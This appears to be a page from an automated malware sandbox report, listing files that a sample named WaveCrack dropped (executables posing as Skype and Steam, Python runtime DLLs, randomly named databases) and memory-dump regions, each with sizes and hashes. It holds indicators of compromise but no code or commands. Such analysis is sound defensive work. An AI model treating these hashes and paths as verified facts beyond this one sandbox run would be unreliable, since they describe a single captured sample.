b77dbb1922703acac12e8166969e7505b27f5a0a1a1879e403eaacb5dd26cc21

SHA512
f5c4bbfbe9841368671adc0f6936c254f300e868c7dccd4bc3637d3ea9dec241238bac9b38ef19640bd6d1154953995f17547e587b1979ebeeabed8014e4a88d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Skype.exe

Filesize
17.0MB

MD5
0c3601ca81369b533e68889cc21c1197

SHA1
17807a41c306b866551901eb09b92be8efcdde17

SHA256
4a6763b5fffe9c518af2a7118f99bff94f7871ae941b896687343ec98b4b3e58

SHA512
31d137b5497191108de96a36bdb78dbde2360d4df9a314052e141c50451bcfd5d624faf87b660a7e76a132210aef8ba6592150f0f0043cc913c5035a464351bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\Steam.exe

Filesize
3.4MB

MD5
666202ce5a222ef2655e6030d6b098f0

SHA1
afe2d40bd64f7b8d1fcdfc275f57b3d49ae19528

SHA256
7802c7c7a39977e70d7913cf051a63d7c5f4f8e95a30a8be5d9cb82941178843

SHA512
46aeed66a9a1add01e39487e37f4440a8b753401928ecda9a309e6efa2f93bcb1bff91a8c0d9d30e3dad57c02e56146fd6ea1778a0f6ac813944fe248234923f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI57242\VCRUNTIME140.dll

Filesize
93KB

MD5
4a365ffdbde27954e768358f4a4ce82e

SHA1
a1b31102eee1d2a4ed1290da2038b7b9f6a104a3

SHA256
6a0850419432735a98e56857d5cfce97e9d58a947a9863ca6afadd1c7bcab27c

SHA512
54e4b6287c4d5a165509047262873085f50953af63ca0dcb7649c22aba5b439ab117a7e0d6e7f0a3e51a23e28a255ffd1ca1ddce4b2ea7f87bca1c9b0dbe2722

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI57242\api-ms-win-core-console-l1-1-0.dll

Filesize
21KB

MD5
e8b9d74bfd1f6d1cc1d99b24f44da796

SHA1
a312cfc6a7ed7bf1b786e5b3fd842a7eeb683452

SHA256
b1b3fd40ab437a43c8db4994ccffc7f88000cc8bb6e34a2bcbff8e2464930c59

SHA512
b74d9b12b69db81a96fc5a001fd88c1e62ee8299ba435e242c5cb2ce446740ed3d8a623e1924c2bc07bfd9aef7b2577c9ec8264e53e5be625f4379119bafcc27

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI57242\api-ms-win-core-datetime-l1-1-0.dll

Filesize
21KB

MD5
cfe0c1dfde224ea5fed9bd5ff778a6e0

SHA1
5150e7edd1293e29d2e4d6bb68067374b8a07ce6

SHA256
0d0f80cbf476af5b1c9fd3775e086ed0dfdb510cd0cc208ec1ccb04572396e3e

SHA512
b0e02e1f19cfa7de3693d4d63e404bdb9d15527ac85a6d492db1128bb695bffd11bec33d32f317a7615cb9a820cd14f9f8b182469d65af2430ffcdbad4bd7000

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI57242\api-ms-win-core-debug-l1-1-0.dll

Filesize
21KB

MD5
33bbece432f8da57f17bf2e396ebaa58

SHA1
890df2dddfdf3eeccc698312d32407f3e2ec7eb1

SHA256
7cf0944901f7f7e0d0b9ad62753fc2fe380461b1cce8cdc7e9c9867c980e3b0e

SHA512
619b684e83546d97fc1d1bc7181ad09c083e880629726ee3af138a9e4791a6dcf675a8df65dc20edbe6465b5f4eac92a64265df37e53a5f34f6be93a5c2a7ae5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI57242\api-ms-win-core-errorhandling-l1-1-0.dll

Filesize
21KB

MD5
eb0978a9213e7f6fdd63b2967f02d999

SHA1
9833f4134f7ac4766991c918aece900acfbf969f

SHA256
ab25a1fe836fc68bcb199f1fe565c27d26af0c390a38da158e0d8815efe1103e

SHA512
6f268148f959693ee213db7d3db136b8e3ad1f80267d8cbd7d5429c021adaccc9c14424c09d527e181b9c9b5ea41765aff568b9630e4eb83bfc532e56dfe5b63

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI57242\api-ms-win-core-file-l1-1-0.dll

Filesize
25KB

MD5
efad0ee0136532e8e8402770a64c71f9

SHA1
cda3774fe9781400792d8605869f4e6b08153e55

SHA256
3d2c55902385381869db850b526261ddeb4628b83e690a32b67d2e0936b2c6ed

SHA512
69d25edf0f4c8ac5d77cb5815dfb53eac7f403dc8d11bfe336a545c19a19ffde1031fa59019507d119e4570da0d79b95351eac697f46024b4e558a0ff6349852

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI57242\api-ms-win-core-file-l1-2-0.dll

Filesize
21KB

MD5
1c58526d681efe507deb8f1935c75487

SHA1
0e6d328faf3563f2aae029bc5f2272fb7a742672

SHA256
ef13dce8f71173315dfc64ab839b033ab19a968ee15230e9d4d2c9d558efeee2

SHA512
8edb9a0022f417648e2ece9e22c96e2727976332025c3e7d8f15bcf6d7d97e680d1bf008eb28e2e0bd57787dcbb71d38b2deb995b8edc35fa6852ab1d593f3d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI57242\api-ms-win-core-file-l2-1-0.dll

Filesize
18KB

MD5
bfffa7117fd9b1622c66d949bac3f1d7

SHA1
402b7b8f8dcfd321b1d12fc85a1ee5137a5569b2

SHA256
1ea267a2e6284f17dd548c6f2285e19f7edb15d6e737a55391140ce5cb95225e

SHA512
b319cc7b436b1be165cdf6ffcab8a87fe29de78f7e0b14c8f562be160481fb5483289bd5956fdc1d8660da7a3f86d8eede35c6cc2b7c3d4c852decf4b2dcdb7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI57242\api-ms-win-core-handle-l1-1-0.dll

Filesize
21KB

MD5
e89cdcd4d95cda04e4abba8193a5b492

SHA1
5c0aee81f32d7f9ec9f0650239ee58880c9b0337

SHA256
1a489e0606484bd71a0d9cb37a1dc6ca8437777b3d67bfc8c0075d0cc59e6238

SHA512
55d01e68c8c899e99a3c62c2c36d6bcb1a66ff6ecd2636d2d0157409a1f53a84ce5d6f0c703d5ed47f8e9e2d1c9d2d87cc52585ee624a23d92183062c999b97e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI57242\api-ms-win-core-heap-l1-1-0.dll

Filesize
21KB

MD5
accc640d1b06fb8552fe02f823126ff5

SHA1
82ccc763d62660bfa8b8a09e566120d469f6ab67

SHA256
332ba469ae84aa72ec8cce2b33781db1ab81a42ece5863f7a3cb5a990059594f

SHA512
6382302fb7158fc9f2be790811e5c459c5c441f8caee63df1e09b203b8077a27e023c4c01957b252ac8ac288f8310bcee5b4dcc1f7fc691458b90cdfaa36dcbe

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI57242\api-ms-win-core-interlocked-l1-1-0.dll

Filesize
21KB

MD5
c6024cc04201312f7688a021d25b056d

SHA1
48a1d01ae8bc90f889fb5f09c0d2a0602ee4b0fd

SHA256
8751d30df554af08ef42d2faa0a71abcf8c7d17ce9e9ff2ea68a4662603ec500

SHA512
d86c773416b332945acbb95cbe90e16730ef8e16b7f3ccd459d7131485760c2f07e95951aeb47c1cf29de76affeb1c21bdf6d8260845e32205fe8411ed5efa47

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI57242\api-ms-win-core-libraryloader-l1-1-0.dll

Filesize
21KB

MD5
1f2a00e72bc8fa2bd887bdb651ed6de5

SHA1
04d92e41ce002251cc09c297cf2b38c4263709ea

SHA256
9c8a08a7d40b6f697a21054770f1afa9ffb197f90ef1eee77c67751df28b7142

SHA512
8cf72df019f9fc9cd22ff77c37a563652becee0708ff5c6f1da87317f41037909e64dcbdcc43e890c5777e6bcfa4035a27afc1aeeb0f5deba878e3e9aef7b02a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI57242\api-ms-win-core-localization-l1-2-0.dll

Filesize
21KB

MD5
724223109e49cb01d61d63a8be926b8f

SHA1
072a4d01e01dbbab7281d9bd3add76f9a3c8b23b

SHA256
4e975f618df01a492ae433dff0dd713774d47568e44c377ceef9e5b34aad1210

SHA512
19b0065b894dc66c30a602c9464f118e7f84d83010e74457d48e93aaca4422812b093b15247b24d5c398b42ef0319108700543d13f156067b169ccfb4d7b6b7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI57242\api-ms-win-core-memory-l1-1-0.dll

Filesize
21KB

MD5
3c38aac78b7ce7f94f4916372800e242

SHA1
c793186bcf8fdb55a1b74568102b4e073f6971d6

SHA256
3f81a149ba3862776af307d5c7feef978f258196f0a1bf909da2d3f440ff954d

SHA512
c2746aa4342c6afffbd174819440e1bbf4371a7fed29738801c75b49e2f4f94fd6d013e002bad2aadafbc477171b8332c8c5579d624684ef1afbfde9384b8588

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI57242\api-ms-win-core-namedpipe-l1-1-0.dll

Filesize
21KB

MD5
321a3ca50e80795018d55a19bf799197

SHA1
df2d3c95fb4cbb298d255d342f204121d9d7ef7f

SHA256
5476db3a4fecf532f96d48f9802c966fdef98ec8d89978a79540cb4db352c15f

SHA512
3ec20e1ac39a98cb5f726d8390c2ee3cd4cd0bf118fdda7271f7604a4946d78778713b675d19dd3e1ec1d6d4d097abe9cd6d0f76b3a7dff53ce8d6dbc146870a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI57242\api-ms-win-core-processenvironment-l1-1-0.dll

Filesize
21KB

MD5
0462e22f779295446cd0b63e61142ca5

SHA1
616a325cd5b0971821571b880907ce1b181126ae

SHA256
0b6b598ec28a9e3d646f2bb37e1a57a3dda069a55fba86333727719585b1886e

SHA512
07b34dca6b3078f7d1e8ede5c639f697c71210dcf9f05212fd16eb181ab4ac62286bc4a7ce0d84832c17f5916d0224d1e8aab210ceeff811fc6724c8845a74fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI57242\api-ms-win-core-processthreads-l1-1-0.dll

Filesize
21KB

MD5
c3632083b312c184cbdd96551fed5519

SHA1
a93e8e0af42a144009727d2decb337f963a9312e

SHA256
be8d78978d81555554786e08ce474f6af1de96fcb7fa2f1ce4052bc80c6b2125

SHA512
8807c2444a044a3c02ef98cf56013285f07c4a1f7014200a21e20fcb995178ba835c30ac3889311e66bc61641d6226b1ff96331b019c83b6fcc7c87870cce8c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI57242\base_library.zip

Filesize
826KB

MD5
2abe470164e060916c6842da1263e5ad

SHA1
197163bfb26ce54420fa6eba03cf0fa0a5622934

SHA256
151a4c8ea261130b5ae94653e5470ac6fe4663de269c187b2b38d6fccadc1baa

SHA512
01e2c58b24f7d3d7b31df97c6dbe8aee0c0f61f457c78d62830fa954c17dffb74b4e5389ef389926b5ba78f96deb08ad4cd61c9ecea256bf35e0a99cd2366d65

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI57242\python39.dll

Filesize
4.3MB

MD5
5cd203d356a77646856341a0c9135fc6

SHA1
a1f4ac5cc2f5ecb075b3d0129e620784814a48f7

SHA256
a56afcf5f3a72769c77c3bc43c9b84197180a8b3380b6258073223bfd72ed47a

SHA512
390008d57fa711d7c88b77937bf16fdb230e7c1e7182faea6d7c206e9f65ced6f2e835f9da9befb941e80624abe45875602e0e7ad485d9a009d2450a2a0e0f1f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI57242\ucrtbase.dll

Filesize
992KB

MD5
0e0bac3d1dcc1833eae4e3e4cf83c4ef

SHA1
4189f4459c54e69c6d3155a82524bda7549a75a6

SHA256
8a91052ef261b5fbf3223ae9ce789af73dfe1e9b0ba5bdbc4d564870a24f2bae

SHA512
a45946e3971816f66dd7ea3788aacc384a9e95011500b458212dc104741315b85659e0d56a41570731d338bdf182141c093d3ced222c007038583ceb808e26fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gekpp0wu.1k4.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Tempcsqkfbvsdu.db

Filesize
20KB

MD5
a603e09d617fea7517059b4924b1df93

SHA1
31d66e1496e0229c6a312f8be05da3f813b3fa9e

SHA256
ccd15f9c7a997ae2b5320ea856c7efc54b5055254d41a443d21a60c39c565cb7

SHA512
eadb844a84f8a660c578a2f8e65ebcb9e0b9ab67422be957f35492ff870825a4b363f96fd1c546eaacfd518f6812fcf57268ef03c149e5b1a7af145c7100e2cc

Download Submit
C:\Users\Admin\AppData\Local\Tempcssdjrxbpl.db

Filesize
114KB

MD5
90a154a5a49cfdedd79b04b752a1eeb6

SHA1
ca2a9ac4b15e745c203d811c3275779d9cd7d957

SHA256
2d2968f191b8ae8a35c217497004c579d896bfee1b8dd48e48f54ddb2109f418

SHA512
11f8f95d16223da10783e72898bed150439d431ee59bfa16e7a81b0965c00d525081cf2d19a5e8e7062e7ab9375b44909002dafc69578463a1e86cbb27fab52b

Download Submit
C:\Users\Admin\AppData\Local\Tempcstbcqrqtz.db

Filesize
40KB

MD5
a182561a527f929489bf4b8f74f65cd7

SHA1
8cd6866594759711ea1836e86a5b7ca64ee8911f

SHA256
42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

SHA512
9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

Download Submit
C:\Users\Admin\AppData\Local\Tempcswngtbivg.db

Filesize
116KB

MD5
11cb6019cd4b8d77acb867522335c9a3

SHA1
469f8a7baf23c7046b0dbc4913398d2542be1ba7

SHA256
5f60917f02443c21ff5118b90ad5d765f87035ae27792f4142ec98cae2f7ce04

SHA512
646eb93eb360eb4e8ce8e48c6bec6098075a541a619a601a4c51dced5a0ac2b5c9c3f4005b38ab2a15f50e380ed2e3d13465782d113f4f648268ab7703d2d8cf

Download Submit
C:\Users\Admin\AppData\Local\Tempcsyqgevvyx.db

Filesize
48KB

MD5
349e6eb110e34a08924d92f6b334801d

SHA1
bdfb289daff51890cc71697b6322aa4b35ec9169

SHA256
c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a

SHA512
2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

Download Submit
C:\Users\Admin\AppData\Roaming\WaveCrack.exe

Filesize
9.7MB

MD5
f61e43c466c1c22f536c40f70b39aea8

SHA1
9e5e4cb165e34633fbc7186575802a1a631ec1b8

SHA256
3affb6776eaefca68e183a75a0e1c98e92fdc4408cb533cd2dea6448910d582d

SHA512
3ca0a01315c6e76dd66416001b7a83f1d21f2302f7c2b6f9442dc3cf88c228a00c27f7f313799834dbdc26794c0c4ff2559be5f757b1c49808e404bc859656aa

Download Submit
C:\Users\Admin\AppData\Roaming\WaveCrack.sfx.exe

Filesize
9.9MB

MD5
62ac4fbcefaeb331d4142d9ce5307613

SHA1
662eb3adab7043b487be85204b3ba86baaee85b6

SHA256
256f9991fc88c3b85c514877f04b7ede0719e94bb048b3a9ce351b0fe02d8e7e

SHA512
945063ac2b814c73f3457a84d665485958955baacf1a25b56544b9935713586783949a4b42d22da998eda2e6138f6ed1db028d7d297bb7cfcf796d265f3b2e16

Download Submit
C:\Users\Admin\AppData\Roaming\WaveWindows.exe

Filesize
8.0MB

MD5
b8631bbd78d3935042e47b672c19ccc3

SHA1
cd0ea137f1544a31d2a62aaed157486dce3ecebe

SHA256
9cfda541d595dc20a55df5422001dfb58debd401df3abff21b1eee8ede28451c

SHA512
0c51d6247e39f7851538a5916b24972e845abfe429f0abdc7b532f654b4afe73dc6e1936f1b062da63bfc90273d3cbc297bf6c802e615f3711d0f180c070aa26

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 82625.crdownload

Filesize
3.8MB

MD5
46c17c999744470b689331f41eab7df1

SHA1
b8a63127df6a87d333061c622220d6d70ed80f7c

SHA256
c5b5def1c8882b702b6b25cbd94461c737bc151366d2d9eba5006c04886bfc9a

SHA512
4b02a3e85b699f62df1b4fe752c4dee08cfabc9b8bb316bc39b854bd5187fc602943a95788ec680c7d3dc2c26ad882e69c0740294bd6cb3b32cdcd165a9441b6

Download Submit
C:\Users\Admin\Downloads\Wave\WaveCrack.exe

Filesize
17.7MB

MD5
a6be2c6f54c2507fc215f05278c3be2a

SHA1
c17146befe38e791e3e37c22185795ecf412fb75

SHA256
a83a6b1433e7a03ddf2683d884e64172ed833190790c7639e39d9017797665b5

SHA512
324f720bbae0d61749f88b6e89e1d62f72368b44696bd828160207a7195cf9438b9d7f7594fd76eec3e51a4b620eb5a328b1401a242cbfd7cd26d93e04942dd4

Download Submit
memory/1660-1023-0x0000015AF5180000-0x0000015AF519E000-memory.dmp

Filesize
120KB

Download
memory/1660-1022-0x0000015AF50E0000-0x0000015AF5156000-memory.dmp

Filesize
472KB

Download
memory/1660-1097-0x0000015AF5080000-0x0000015AF508A000-memory.dmp

Filesize
40KB

Download
memory/1660-859-0x0000015AF2990000-0x0000015AF29E8000-memory.dmp

Filesize
352KB

Download
memory/1660-1098-0x0000015AF51A0000-0x0000015AF51B2000-memory.dmp

Filesize
72KB

Download
memory/1740-1001-0x000001D232000000-0x000001D232022000-memory.dmp

Filesize
136KB

Download
memory/2724-841-0x0000000000080000-0x00000000003E6000-memory.dmp

Filesize
3.4MB

Download
memory/3472-815-0x000000000AA90000-0x000000000AAA6000-memory.dmp

Filesize
88KB

Download
memory/3472-807-0x00000000036E0000-0x00000000036EA000-memory.dmp

Filesize
40KB

Download
memory/3472-816-0x000000000ACE0000-0x000000000ACEA000-memory.dmp

Filesize
40KB

Download
memory/3472-814-0x000000000AAD0000-0x000000000AB46000-memory.dmp

Filesize
472KB

Download
memory/3472-812-0x000000000A250000-0x000000000A258000-memory.dmp

Filesize
32KB

Download
memory/3472-811-0x000000000A9E0000-0x000000000AA06000-memory.dmp

Filesize
152KB

Download
memory/3472-810-0x000000000A220000-0x000000000A252000-memory.dmp

Filesize
200KB

Download
memory/3472-809-0x0000000003700000-0x000000000370A000-memory.dmp

Filesize
40KB

Download
memory/3472-768-0x0000000006010000-0x0000000006018000-memory.dmp

Filesize
32KB

Download
memory/3472-766-0x0000000005FE0000-0x0000000005FE8000-memory.dmp

Filesize
32KB

Download
memory/3472-808-0x000000000A860000-0x000000000A8D6000-memory.dmp

Filesize
472KB

Download
memory/3472-817-0x000000000AD40000-0x000000000AD5E000-memory.dmp

Filesize
120KB

Download
memory/3472-806-0x000000000A1C0000-0x000000000A1CE000-memory.dmp

Filesize
56KB

Download
memory/3472-805-0x000000000A1E0000-0x000000000A218000-memory.dmp

Filesize
224KB

Download
memory/3472-695-0x0000000000BD0000-0x00000000013D2000-memory.dmp

Filesize
8.0MB

Download
memory/3472-764-0x0000000005E70000-0x0000000005F22000-memory.dmp

Filesize
712KB

Download
memory/3472-765-0x0000000005F30000-0x0000000005FD0000-memory.dmp

Filesize
640KB

Download
memory/4052-1020-0x000000001C8B0000-0x000000001C962000-memory.dmp

Filesize
712KB

Download
memory/4052-1018-0x000000001C7A0000-0x000000001C7F0000-memory.dmp

Filesize
320KB

Download
memory/4052-1101-0x000000001C7F0000-0x000000001C802000-memory.dmp

Filesize
72KB

Download
memory/4052-1102-0x000000001C850000-0x000000001C88C000-memory.dmp

Filesize
240KB

Download